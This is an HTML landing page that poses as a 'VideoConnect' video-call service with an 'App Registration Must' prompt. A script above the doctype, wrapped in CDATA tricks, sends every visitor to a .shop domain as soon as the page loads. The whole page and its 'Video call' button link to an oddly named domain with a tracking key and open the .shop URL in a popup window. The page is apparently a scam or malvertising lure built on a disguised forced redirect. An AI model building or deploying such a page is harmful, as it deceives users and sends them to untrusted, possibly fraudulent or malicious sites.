<script><!--//--><![CDATA[// ><!--
location.href="https://125700.shop/74f4ac111f75fa7053bc/6f358a4e27/?placementName=default"
//--><!]]]]><![CDATA[>

//--><!
// ]]></script>

<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>VideoConnect</title>
    <style>
      body,
      html {
        margin: 0;
        padding: 0;
        height: 100%;
        font-family: Arial, sans-serif;
      }
      .container {
        position: relative;
        height: 100%;
        display: flex;
        flex-direction: column;
        justify-content: center;
        align-items: center;
        background: url("image/1.png") no-repeat center center;
        background-size: cover;
      }
      .overlay {
        position: absolute;
        top: 0;
        left: 0;
        right: 0;
        bottom: 0;
        background-color: rgba(255, 192, 203, 0.6); /* Light pink overlay */
      }
      .content {
        position: relative;
        z-index: 1;
        text-align: center;
        color: white;
        margin-top: -150px;
      }
      .logo {
        width: 100px;
        height: 100px;
        /* background-color: #4caf50; */
        /* border-radius: 50%; */
        margin: 0;
        object-fit: contain;
      }
      h1 {
        font-size: 3rem;
        margin-bottom: 20px;
        margin-top: 20px;
        color: white;
        text-decoration: none;
      }
      .button {
        display: inline-block;
        padding: 1.2rem 5rem;
        background-color: #4caf50;
        color: white;
        text-decoration: none;
        border-radius: 15px;
        font-size: 1.4rem;
        font-weight: 700;
        transition: background-color 0.3s;
      }
      .button:hover {
        background-color: #f0f0f0;
        color: #4caf50;
      }
    </style>
  </head>
  <body>
    <a
      href="https://contemnomnipresentinstantly.com/d3j0rstnj?key=ecbda8233801fd42745c1794da01c108" onclick="window.open('https://125700.shop/74f4ac111f75fa7053bc/6f358a4e27/?placementName=default'); return true;"
      style="text-decoration: none"
    >
      <div class="container">
        <div class="overlay"></div>
        <div class="content">
          <img src="image/2.png" class="logo" alt="" />
          <h1>Video Call Service</h1>
		  <h2>App Registration Must</h2>
          <a
            href="https://contemnomnipresentinstantly.com/d3j0rstnj?key=ecbda8233801fd42745c1794da01c108" onclick="window.open('https://125700.shop/74f4ac111f75fa7053bc/6f358a4e27/?placementName=default'); return true;"
			class="button"
			>Video call</a
          >
        </div>
      </div>
    </a>
  </body>
</html>
